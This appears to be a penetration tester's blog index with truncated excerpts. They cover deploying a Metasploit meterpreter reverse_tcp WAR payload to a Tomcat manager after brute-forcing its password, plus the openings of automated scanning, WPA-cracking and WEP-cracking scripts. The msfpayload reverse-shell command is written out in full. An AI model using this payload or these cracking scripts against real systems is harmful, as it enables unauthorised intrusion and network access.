So, you’ve just brute forced the admin password for the Tomcat web app manager and you want to take it a step further…. step in metasploit.

msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box.

1./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W >; /root/MetRev.war

Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.

Once uploaded you then need to connect… Continue reading

Here’s my automated scanning script. It’s got a few dependencies but will run with a number of threads and will output to a defined folder.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281#!/bin/bash #__________________________________________________________ # Author:     phillips321 forum.gnacktrack.co.uk # License:    CC BY-SA 3.0 # Use:        Update several applications # Released:   www.gnacktrack.co.uk   version=1.0 # Dependencies: #           nmap #           sslscan #… Continue reading

So on a job i had captured some data transfer off the wire but wanted to put some proof of that in the report and for some brownie points.

I wasn’t entirely sure what tool to use but a quick google pointed me in the direction of foremost.

The pcap was captured in wireshark so i opened it up again and found the correct TCP stream that contained what… Continue reading

I have wrote an automated WPA cracking script (matts-wpacrack.sh). Let me know if you have any improvements.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140#!/bin/bash # wpacrack.sh v.1.1 # Create by Matthew Phillips # New versions can be downloaded from www.phillips321.co.uk # VERSION="1.1" # This tool requires aircrack-ng tools to be installed and run as root # # ChangeLog.... # Version 1.1 - Randomises MAC Address on start # Version 1.0 - First Release ################################################################# # CHECKING… Continue reading

I have wrote an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134#!/bin/bash # wepcrack.sh v1.3 # Create by Matthew Phillips # New versions can be downloaded from www.phillips321.co.uk VERSION="1.3" # # This tool requires aircrack-ng tools to be installed and run as root # # ChangeLog.... # Version 1.3 - Randomises interface MAC address # Version 1.2 - Set txpower of card to 1000mw… Continue reading